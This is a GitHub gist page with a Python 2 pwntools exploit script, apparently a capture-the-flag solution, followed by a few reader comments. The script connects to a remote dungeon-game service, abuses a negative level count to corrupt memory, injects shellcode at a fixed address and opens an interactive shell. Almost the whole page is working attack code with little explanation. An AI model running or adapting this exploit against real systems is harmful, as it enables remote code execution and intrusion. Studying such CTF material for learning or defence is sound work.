
@m--- m---/wby.py Secret
Created Mar 17, 2015

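```python
# coding: utf-8
# Python 2 script (uses print statements).
import os
import sys
import time
import re
import struct

import pwn  # pwntools, provides remote()

host = 'wildblue.termsec.net'
port = 2323

# Pack a value as a 32-bit little-endian integer.
p = lambda x: struct.pack('<I', x)

s = pwn.remote(host, port)

# 0x20 bytes of padding, the address 0x20202024, then shellcode read from a local file.
payload = ('C' * 0x20) + p(0x20202024) + open('x86-linux-sh', 'rb').read()

print s.recvuntil('By what name shall we know thee? \n')
s.send('AAAA\n')

# Menu option 1, answering the "[1-3]" level-count prompt with -1.
print s.recvuntil('What is your choice?\n')
s.send('1\n')
print s.recvuntil('How many levels should your dungeon have [1-3]:\n')
s.send('-1\n')

# Levels 0x00-0xb1 get filler data.
for i in range(0x0, 0xb2):
    print s.recvuntil('Enter your data for level %d:\n' % i)
    s.send('a' + '\n')

# Level 0xb2 receives the payload.
print s.recvuntil('Enter your data for level %d:\n' % 0xb2)
s.send(payload + '\n')

# Levels 0xb3-0xfe get filler data.
for i in range(0xb3, 0xff):
    print s.recvuntil('Enter your data for level %d:\n' % i)
    s.send('c' + '\n')

time.sleep(1)

# Menu option 3: send a new name of 48 bytes of padding followed by the same address.
print s.recvuntil('What is your choice?\n')
s.send('3\n')
print s.recvuntil('By what name shall we know thee? \n')
s.send(('D' * 48) + p(0x20202024) + '\n')

# Menu option 4, then hand the connection over to the terminal.
print s.recvuntil('What is your choice?\n')
s.send('4\n')
s.interactive()
```
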
@Grazfather


commented Mar 18, 2015

What is the pwn lib?

@m---

Owner Author

commented Mar 18, 2015

@Grazfather


commented Mar 18, 2015

Thanks!

@letitbezh


commented Apr 20, 2017

Excuse me! Why should we locate in 0x20202020? I don't know why 0x20202020 is executable? Thank you for your writeup.
